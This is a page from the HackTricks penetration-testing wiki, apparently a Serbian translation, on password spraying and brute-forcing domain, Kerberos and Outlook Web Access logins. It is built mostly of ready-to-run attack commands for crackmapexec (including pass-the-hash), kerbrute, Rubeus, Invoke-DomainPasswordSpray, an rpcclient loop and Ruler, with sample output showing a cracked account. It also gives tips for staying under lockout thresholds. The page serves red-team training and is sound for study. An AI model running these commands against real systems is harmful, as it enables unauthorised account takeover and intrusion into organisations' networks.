Password Spraying / Brute Force

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:

On-demand Mobile Security Training | 8kSec Academy8kSec Academy

Password Spraying

Kada pronađete nekoliko validnih korisničkih imena, možete probati najviše uobičajene lozinke (imajte na umu politiku lozinki okruženja) sa svakim od otkrivenih korisnika. Po defaultu, minimalna dužina lozinke je 7.

Liste uobičajenih korisničkih imena takođe mogu biti korisne: https://github.com/insidetrust/statistically-likely-usernames

Obratite pažnju da možete zaključati neke naloge ako pokušate nekoliko pogrešnih lozinki (po defaultu više od 10).

Get password policy

Ako imate neke korisničke akreditive ili shell kao domen korisnik, možete dobiti politiku lozinki sa:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Eksploatacija iz Linux-a (ili svih)

Korišćenje crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

Korišćenje kerbrute (Go)

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

spray (možete naznačiti broj pokušaja kako biste izbegli zaključavanje):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

Korišćenje kerbrute (python) - NIJE PREPORUČENO, PONEKAD NE RADI

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

Sa scanner/smb/smb_login modulom Metasploit:

Koristeći rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Iz Windows-a

Sa Rubeus verzijom sa brute modulom:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

Sa Invoke-DomainPasswordSpray (Može generisati korisnike iz domena po defaultu i dobiće pravila lozinki iz domena i ograničiti pokušaje u skladu s tim):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

Sa Invoke-SprayEmptyPassword.ps1

Invoke-SprayEmptyPassword

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Outlook Web Access

Postoji više alata za password spraying outlook.

Sa MSF Owa_login
sa MSF Owa_ews_login
Sa Ruler (pouzdan!)
Sa DomainPasswordSpray (Powershell)
Sa MailSniper (Powershell)

Da biste koristili bilo koji od ovih alata, potrebna vam je lista korisnika i lozinka / mala lista lozinki za spray.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

https://github.com/ustayready/CredKing/blob/master/credking.py

Okta

References

Produbite svoje znanje u Mobilnoj Bezbednosti sa 8kSec Akademijom. Savladajte iOS i Android bezbednost kroz naše kurseve koji se mogu pratiti sopstvenim tempom i dobijte sertifikat:

On-demand Mobile Security Training | 8kSec Academy8kSec Academy

Podrška HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousPass the Ticket NextPrintNightmare

Last updated 1 day ago